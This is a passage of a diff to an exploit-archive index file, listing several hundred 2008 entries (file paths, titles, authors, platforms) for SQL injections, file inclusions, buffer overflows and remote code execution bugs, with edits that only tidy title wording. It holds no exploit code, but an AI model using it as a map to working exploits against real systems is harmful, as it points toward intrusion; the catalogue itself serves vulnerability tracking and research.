6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0 6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 @@ -6336,7 +6337,7 @@ id,file,description,date,author,platform,type,port 6765,platforms/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injections",2008-10-16,JosS,php,webapps,0 6766,platforms/php/webapps/6766.txt,"PokerMax Poker League - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0 6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post & doc) Local File Inclusion",2008-10-16,JosS,php,webapps,0 -6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution Exploit",2008-10-16,EgiX,php,webapps,0 +6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution",2008-10-16,EgiX,php,webapps,0 6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - 'search.php' SQL Injection",2008-10-16,StAkeR,php,webapps,0 6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - (file) File Disclosure",2008-10-16,LMaster,php,webapps,0 6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 - Admin Authentication Bypass",2008-10-16,SecVuln,cgi,webapps,0 @@ -6345,54 +6346,54 @@ id,file,description,date,author,platform,type,port 6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0 6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0 6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0 -6777,platforms/php/webapps/6777.txt,"Wordpress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,php,webapps,0 +6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,php,webapps,0 6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - (kategorino) SQL Injection",2008-10-18,EcHoLL,php,webapps,0 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 6780,platforms/php/webapps/6780.txt,"zeeproperty - (adid) SQL Injection",2008-10-18,"Hussin X",php,webapps,0 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - (del.php) Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0 -6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - (fckeditor) Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0 +6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0 6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111 6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local,0 6788,platforms/php/webapps/6788.txt,"yappa-ng 2.3.3-beta0 - (album) Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 6789,platforms/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0 -6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - (itemID) Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0 +6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0 6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection",2008-10-19,girex,php,webapps,0 6792,platforms/php/webapps/6792.txt,"Joomla Component ds-syndicate - (feed_id) SQL Injection",2008-10-20,boom3rang,php,webapps,0 6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow Exploit",2008-10-20,InTeL,windows,remote,0 6795,platforms/php/webapps/6795.txt,"XOOPS Module makale - SQL Injection",2008-10-20,EcHoLL,php,webapps,0 6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0 -6798,platforms/windows/local/6798.pl,"VLC Media Player - .TY File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0 +6798,platforms/windows/local/6798.pl,"VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0 6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0 -6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - sftp rename Remote Buffer Overflow PoC (Post-Authenticated)",2008-10-22,"Jeremy Brown",windows,dos,0 +6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Post-Authentication) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0 6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0 6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0 6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 -6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (ajax.php) SQL Injection (Post-Authenticated)",2008-10-22,Xianur0,php,webapps,0 +6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Post-Authentication) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0 -6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - sftp realpath Remote Buffer Overflow PoC (Post-Authenticated)",2008-10-22,"Jeremy Brown",windows,dos,0 +6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Post-Authentication) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0 -6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - (language) Local File Inclusion",2008-10-23,Pepelux,php,webapps,0 +6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Local File Inclusion",2008-10-23,Pepelux,php,webapps,0 6817,platforms/php/webapps/6817.txt,"Joomla Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin Exploit",2008-10-23,"CWH Underground",php,webapps,0 6821,platforms/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,php,webapps,0 6822,platforms/php/webapps/6822.txt,"websvn 2.0 - (Cross-Site Scripting / File Handling/Code Execution) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 -6823,platforms/php/webapps/6823.txt,"siteengine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 +6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0 -6825,platforms/windows/local/6825.pl,"VLC 0.9.4 - (.ty) Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0 -6826,platforms/php/webapps/6826.txt,"joomla component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0 +6825,platforms/windows/local/6825.pl,"VLC 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0 +6826,platforms/php/webapps/6826.txt,"joomla Component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0 6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX - 'VImpX.ocx' Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0 @@ -6400,15 +6401,15 @@ id,file,description,date,author,platform,type,port 6831,platforms/windows/local/6831.cpp,"TUGzip 3.00 archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0 6833,platforms/php/webapps/6833.txt,"phpdaily - (SQL Injection / Cross-Site Scripting / lfd) Multiple Vulnerabilities",2008-10-24,0xFFFFFF,php,webapps,0 -6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - (LIST) Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos,0 +6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - 'LIST' Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos,0 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module - Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 -6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution Exploit (MS08-067) (Universal)",2008-10-26,EMM,windows,remote,135 -6842,platforms/php/webapps/6842.txt,"Wordpress Media Holder - 'mediaHolder.php id' SQL Injection",2008-10-26,boom3rang,php,webapps,0 +6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution (MS08-067) (Universal)",2008-10-26,EMM,windows,remote,135 +6842,platforms/php/webapps/6842.txt,"WordPress Media Holder - 'mediaHolder.php id' SQL Injection",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - 'forum.php id' SQL Injection",2008-10-26,Hurley,php,webapps,0 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0 6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution Exploit",2008-10-26,S0l1D,cgi,webapps,0 @@ -6433,12 +6434,12 @@ id,file,description,date,author,platform,type,port 6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - (board.cgi) Remote Command Execution",2008-10-29,GoLd_M,cgi,webapps,0 6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - (File Disclosure / File Upload / Directory Traversal) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 6866,platforms/php/webapps/6866.pl,"7Shop 1.1 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 -6867,platforms/php/webapps/6867.pl,"Wordpress Plugin e-Commerce 3.4 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 +6867,platforms/php/webapps/6867.pl,"WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6869,platforms/php/webapps/6869.txt,"WebCards 1.3 - SQL Injection",2008-10-29,t0pP8uZz,php,webapps,0 6870,platforms/windows/remote/6870.html,"MW6 Aztec ActiveX - 'Aztec.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6871,platforms/windows/remote/6871.html,"MW6 Barcode ActiveX - 'Barcode.dll' Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 -6872,platforms/windows/remote/6872.html,"MW6 DataMatrix - ActiveX (DataMatrix.dll) Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 +6872,platforms/windows/remote/6872.html,"MW6 Datamatrix - ActiveX (Datamatrix.dll) Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6873,platforms/windows/remote/6873.html,"MW6 PDF417 - ActiveX (MW6PDF417.dll) Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6874,platforms/php/webapps/6874.txt,"Harlandscripts Pro Traffic One - 'mypage.php' SQL Injection",2008-10-29,"Beenu Arora",php,webapps,0 6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - 'VSPDFViewerX.ocx' File Overwrite",2008-10-29,"Marco Torti",windows,remote,0 @@ -6459,17 +6460,17 @@ id,file,description,date,author,platform,type,port 6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6892,platforms/php/webapps/6892.txt,"Absolute Live Support 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6893,platforms/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0 -6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory - 'directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0 +6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0 +6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0 6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection",2008-10-31,ZoRLu,php,webapps,0 6897,platforms/php/webapps/6897.txt,"cpanel 11.x - Cross-Site Scripting / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0 -6898,platforms/php/webapps/6898.txt,"U-Mail Webmail 4.91 - (edit.php) Arbitrary File Write",2008-10-31,"Shennan Wang",php,webapps,0 +6898,platforms/php/webapps/6898.txt,"U-Mail Webmail 4.91 - 'edit.php' Arbitrary File Write",2008-10-31,"Shennan Wang",php,webapps,0 6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 and WL54AP2 - Cross-Site Request Forgery / Cross-Site Scripting",2008-10-31,"Henri Lindberg",hardware,remote,0 6900,platforms/php/webapps/6900.txt,"Absolute News Manager 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6901,platforms/php/webapps/6901.txt,"Absolute News Feed 1.0 - Remote Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6902,platforms/php/webapps/6902.txt,"Absolute FAQ Manager 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6903,platforms/php/webapps/6903.txt,"SFS EZ Hotscripts-like Site - 'cid' SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0 -6904,platforms/php/webapps/6904.txt,"Absolute Newsletter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0 +6903,platforms/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0 +6904,platforms/php/webapps/6904.txt,"Absolute NewsLetter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0 6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 @@ -6488,7 +6489,7 @@ id,file,description,date,author,platform,type,port 6920,platforms/php/webapps/6920.txt,"SFS EZ Top Sites - 'topsite.php ts' SQL Injection",2008-10-31,Stack,php,webapps,0 6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 - writeFile() API Exploit (Metasploit)",2008-11-01,"Kevin Finisterre",windows,remote,0 6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore - (where) SQL Injection",2008-11-01,ZoRLu,php,webapps,0 -6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - 'directory.php cat' SQL Injection",2008-11-01,Hakxer,php,webapps,0 +6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - 'Directory.php cat' SQL Injection",2008-11-01,Hakxer,php,webapps,0 6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - 'id' SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server - Response Remote Crash (PoC)",2008-11-01,DeltahackingTEAM,windows,dos,0 @@ -6556,13 +6557,13 @@ id,file,description,date,author,platform,type,port 6990,platforms/php/webapps/6990.txt,"nicLOR Sito - includefile Local File Inclusion",2008-11-04,StAkeR,php,webapps,0 6991,platforms/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Login Bypass Exploit",2008-11-04,StAkeR,php,webapps,0 6992,platforms/php/webapps/6992.txt,"wotw 5.0 - Local / Remote File Inclusion",2008-11-04,dun,php,webapps,0 -6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 - Code Execution Exploit",2008-11-04,"Charles Fol",php,webapps,0 +6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 - Code Execution",2008-11-04,"Charles Fol",php,webapps,0 6994,platforms/windows/local/6994.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow (1)",2008-11-05,Elazar,windows,local,0 6995,platforms/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages",2008-11-05,StAkeR,php,webapps,0 6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 - (news_id) SQL Injection",2008-11-05,StAkeR,php,webapps,0 6997,platforms/php/webapps/6997.txt,"Pre Podcast Portal - 'Tour.php id' SQL Injection",2008-11-05,G4N0K,php,webapps,0 6998,platforms/php/webapps/6998.txt,"Pre Shopping Mall - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 -6999,platforms/php/webapps/6999.txt,"pre multi-vendor shopping malls - Multiple Vulnerabilities",2008-11-05,G4N0K,php,webapps,0 +6999,platforms/php/webapps/6999.txt,"pre Multiple Vendors shopping malls - Multiple Vulnerabilities",2008-11-05,G4N0K,php,webapps,0 7000,platforms/php/webapps/7000.txt,"Pre Classified Listings - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0 7002,platforms/php/webapps/7002.txt,"Joomla Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0 @@ -6570,11 +6571,11 @@ id,file,description,date,author,platform,type,port 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - (Authentication Bypass) SQL Injection",2008-11-05,"Hussin X",php,webapps,0 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 7006,platforms/windows/local/7006.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow (2)",2008-11-05,"Debasis Mohanty",windows,local,0 -7007,platforms/php/webapps/7007.txt,"HarlandScripts drinks - (recid) SQL Injection Velnerability",2008-11-05,"Ex Tacy",php,webapps,0 +7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection Velnerability",2008-11-05,"Ex Tacy",php,webapps,0 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 -7011,platforms/php/webapps/7011.pl,"Simple Machines Forum 1.1.6 - (Local File Inclusion) Code Execution Exploit",2008-11-05,~elmysterio,php,webapps,0 +7011,platforms/php/webapps/7011.pl,"Simple Machines Forum 1.1.6 - (Local File Inclusion) Code Execution",2008-11-05,~elmysterio,php,webapps,0 7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 - (PHPWebAdmin) File Inclusion",2008-11-06,Nine:Situations:Group,php,webapps,0 7013,platforms/php/webapps/7013.txt,"DevelopItEasy Events Calendar 1.2 - Multiple SQL Injections",2008-11-06,InjEctOr5,php,webapps,0 7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 @@ -6586,20 +6587,20 @@ id,file,description,date,author,platform,type,port 7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",php,webapps,0 7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 - (Authentication Bypass) SQL Injection",2008-11-06,Cyber-Zone,php,webapps,0 7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final - Arbitrary File Delete",2008-11-06,cOndemned,php,webapps,0 -7023,platforms/php/webapps/7023.txt,"DeltaScripts PHP Classifieds 7.5 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 -7024,platforms/php/webapps/7024.txt,"DeltaScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 -7025,platforms/php/webapps/7025.txt,"DeltaScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 +7023,platforms/php/webapps/7023.txt,"DELTAScripts PHP Classifieds 7.5 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 +7024,platforms/php/webapps/7024.txt,"DELTAScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 +7025,platforms/php/webapps/7025.txt,"DELTAScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - (ctg) SQL Injection",2008-11-06,"Hussin X",php,webapps,0 7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 -7028,platforms/php/webapps/7028.txt,"turnkeyforms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,php,webapps,0 -7029,platforms/php/webapps/7029.txt,"turnkeyforms Business Survey Pro 1.0 - 'id' SQL Injection",2008-11-07,G4N0K,php,webapps,0 +7028,platforms/php/webapps/7028.txt,"TurnkeyForms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,php,webapps,0 +7029,platforms/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection",2008-11-07,G4N0K,php,webapps,0 7030,platforms/php/webapps/7030.txt,"Mole Group Pizza - (manufacturers_id) Script SQL Injection",2008-11-07,InjEctOr5,php,webapps,0 -7031,platforms/php/webapps/7031.php,"e-Vision CMS 2.0.2 - Multiple Local File Inclusion Exploit",2008-11-07,StAkeR,php,webapps,0 +7031,platforms/php/webapps/7031.php,"e-Vision CMS 2.0.2 - Multiple Local File Inclusion",2008-11-07,StAkeR,php,webapps,0 7032,platforms/php/webapps/7032.txt,"U&M Software Signup 1.1 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0 7033,platforms/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0 7034,platforms/php/webapps/7034.txt,"U&M Software Event Lister 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0 -7035,platforms/php/webapps/7035.txt,"turnkeyforms Local Classifieds - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-07,TR-ShaRk,php,webapps,0 -7038,platforms/php/webapps/7038.txt,"Joomla Component Clickheat 1.0.1 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0 +7035,platforms/php/webapps/7035.txt,"TurnkeyForms Local Classifieds - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-07,TR-ShaRk,php,webapps,0 +7038,platforms/php/webapps/7038.txt,"Joomla Component ClickHeat 1.0.1 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0 7039,platforms/php/webapps/7039.txt,"Joomla Component Recly!Competitions 1.0.0 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0 7040,platforms/php/webapps/7040.txt,"Joomla Component Feederator 1.0.5 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0 7041,platforms/php/webapps/7041.txt,"E-topbiz Online Store 1 - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 @@ -6608,7 +6609,7 @@ id,file,description,date,author,platform,type,port 7044,platforms/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7045,platforms/php/webapps/7045.txt,"MyioSoft EasyBookMarker - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 -7047,platforms/php/webapps/7047.txt,"DeltaScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0 +7047,platforms/php/webapps/7047.txt,"DELTAScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' SQL Injection",2008-11-07,Stack,php,webapps,0 7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - (File Disclosure / Cross-Site Scripting) Multiple 